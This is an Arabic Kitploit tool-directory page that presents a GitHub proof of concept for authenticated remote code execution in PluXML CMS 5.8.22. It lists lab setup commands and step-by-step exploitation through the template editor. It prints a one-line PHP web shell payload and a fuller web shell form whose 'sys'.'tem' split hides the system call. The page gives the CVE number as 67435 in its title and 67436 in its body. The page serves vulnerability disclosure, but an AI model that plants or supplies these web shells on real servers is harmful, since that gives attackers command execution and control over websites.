Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-67435 — تم تحديد ثغرة حرجة تتمثل في تنفيذ التعليمات البرمجية عن بُعد (RCE) في نظام إدارة المحتوى PluXML CMS الإصدار 5.8.22. تتيح هذه الثغرة للمسؤولين الموثّقين تنفيذ أكواد PHP عشوائية على خادم الويب عن طريق رفع أصداف ويب PHP خبيثة عبر وظيفة محرر القوالب. | Kitploit
أدوات/GitHubGitHub/rajchowdhury240/cve-2025-67435
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubrajchowdhury240/cve-2025-67435

CVE-2025-67435

تم تحديد ثغرة حرجة تتمثل في تنفيذ التعليمات البرمجية عن بُعد (RCE) في نظام إدارة المحتوى PluXML CMS الإصدار 5.8.22. تتيح هذه الثغرة للمسؤولين الموثّقين تنفيذ أكواد PHP عشوائية على خادم الويب عن طريق رفع أصداف ويب PHP خبيثة عبر وظيفة محرر القوالب.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-67436

تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة (RCE) في PluXml CMS 5.8.22

الباحث: Chowdhury Faizal Ahammed

التثبيت

root@kitploit:~
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
صورة صورة صورة صورة صورة

إثبات المفهوم

الاستغلال خطوة بخطوة

المصادقة: سجّل الدخول إلى لوحة تحكم المسؤول في PluXML باستخدام بيانات اعتماد مسؤول صالحة الانتقال إلى محرر القالب:

  • الوصول إلى لوحة تحكم الإدارة
  • الانتقال إلى: القوالب ← Home.php ← تحرير صورة

حقن حمولة خبيثة (Payload):

  • استبدل المحتوى الحالي في home.php بقشرة ويب (Web Shell) بلغة PHP

  • مثال على الحمولة: <?php system($_GET['cmd']); ?>

  • احفظ الملف المعدّل

تشغيل التنفيذ:

  • قم بزيارة الصفحة الرئيسية للموقع
  • يتم تنفيذ كود PHP المحقون بصلاحيات خادم الويب
  • يمكن تنفيذ أوامر عن بُعد عبر: http://target.com/?cmd=whoami

القشرة العكسية (Reverse Shell)

صورة

حمولة قشرة الويب (Webshell)

root@kitploit:~
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input
        type="TEXT"
        name="cmd"
        autofocus
        id="cmd"
        size="80"
      >
      <input
        type="SUBMIT"
        value="Execute"
      >
    </form>

    <pre>
<?php
if (isset($_GET['cmd'])) {
    $func_name = "sys" . "tem";
    $func_name($_GET['cmd']);
}
?>
    </pre>
  </body>
</html>
صورة صورة

المراجع

  • CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
  • الموقع الرسمي لـ PluXML: https://www.pluxml.org/
  • مستودع PluXML على GitHub: https://github.com/pluxml/PluXml
  • OWASP Top 10 - A03:2021 الحقن: https://owasp.org/Top10/A03_2021-Injection/
تنزيل الأداة